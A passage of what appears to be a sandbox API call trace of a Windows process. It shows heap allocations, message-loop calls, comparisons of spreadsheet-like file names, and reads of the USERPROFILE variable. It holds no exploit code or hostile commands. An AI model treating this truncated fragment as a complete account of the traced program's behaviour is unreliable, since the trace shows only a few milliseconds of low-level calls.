cchCount2=6) returned 3 [0219.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BXXG.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0219.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXG.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XG.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0219.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0219.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0219.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.991] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0219.991] TranslateMessage (lpMsg=0x8cf968) returned 0 [0219.991] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0219.991] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0219.991] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.992] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0219.992] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0219.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0219.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0219.992] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0219.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0219.993] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0219.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0219.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0219.994] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0219.994] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0219.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0219.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38544e8 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0219.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0219.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0219.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0219.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0219.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0219.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0219.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0219.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0219.997] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0219.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0219.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0219.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0219.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0219.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0219.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0219.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.999] HeapFree (in: 